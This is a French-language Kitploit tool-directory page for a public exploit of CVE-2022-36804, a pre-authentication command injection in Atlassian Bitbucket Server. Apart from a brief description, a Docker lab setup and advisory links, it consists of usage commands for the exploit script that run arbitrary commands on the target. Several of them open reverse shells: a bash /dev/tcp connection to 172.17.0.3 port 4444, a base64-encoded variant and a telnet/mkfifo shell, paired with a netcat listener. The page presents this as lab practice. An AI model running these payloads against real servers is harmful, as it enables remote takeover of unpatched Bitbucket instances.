Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2022-36804 — Une vulnérabilité critique d'injection de commande a été découverte dans plusieurs points de terminaison API des serveurs Atlassian Bit bucket Server et Data Center. Cette vulnérabilité affecte toutes les versions de Bitbucket Server et Data Center publiées avant les versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 et <8.3.1. | Kitploit
Outils/GitHubGitHub/walnutsecurity/cve-2022-36804
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleLabs et Pratique
GitHubwalnutsecurity/cve-2022-36804

cve-2022-36804

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

84il y a 3 ansPas encore vérifié

Une vulnérabilité critique d'injection de commande a été découverte dans plusieurs points de terminaison API des serveurs Atlassian Bit bucket Server et Data Center. Cette vulnérabilité affecte toutes les versions de Bitbucket Server et Data Center publiées avant les versions <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2 et <8.3.1.

Partager

CVE-2022-36804 : RCE pré-authentification dans Atlassian Bitbucket Server

Une vulnérabilité critique d'injection de commandes a été trouvée dans plusieurs points de terminaison API de l'Atlassian Bit bucket Server et Data center. Cette vulnérabilité affecte toutes les versions de Bitbucket Server et Data Center publiées avant les versions <7.6.17>, <7.17.10>, <7.21.4>, <8.0.3>, <8.1.2>, <8.2.2>, et <8.3.1>

Laboratoire pour CVE-2022-36804

Construire Docker

root@kitploit:~
docker build -t bitbucket .

Exécuter Docker

root@kitploit:~
docker run -it bitbucket

Utilisation de cve-2022-36804.py

Vérifier l'exécution de code à distance (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

Vérifier l'exécution de code à distance (RCE) avec une commande personnalisée (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

Vérifier l'exécution de code à distance (RCE) avec une commande personnalisée, une clé de projet et un nom de dépôt

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

Vérifier un dépôt privé

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -p NEW -r newrepo --session 2074C8FFA5D13088332C8DF0CD8A7CE7

Obtenir un shell avec netcat

Remplacez 172.17.0.3 par votre adresse IP locale

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "/bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1"

Démarrez un écouteur netcat avec :

root@kitploit:~
nc -lvp 4444

Convertissez /bin/bash -i >& /dev/tcp/172.17.0.3/4444 0>&1 en base64 en cas d'erreur d'exécution du payload.

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4xNy4wLjMvNDQ0NCAwPiYx' | base64 -d | bash |"

Si vous rencontrez toujours une erreur, exécutez la commande ci-dessous :

TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.3 4444 0<$TF | /bin/bash 1>$TF"

Il est recommandé d'installer une version vulnérable de Bitbucket Server sur une machine Windows/Linux pour vous entraîner. Il sera facile d'obtenir un reverse shell par rapport aux images Docker.

De plus amples informations sont disponibles ici

Références

  • https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
  • https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
Télécharger l’outil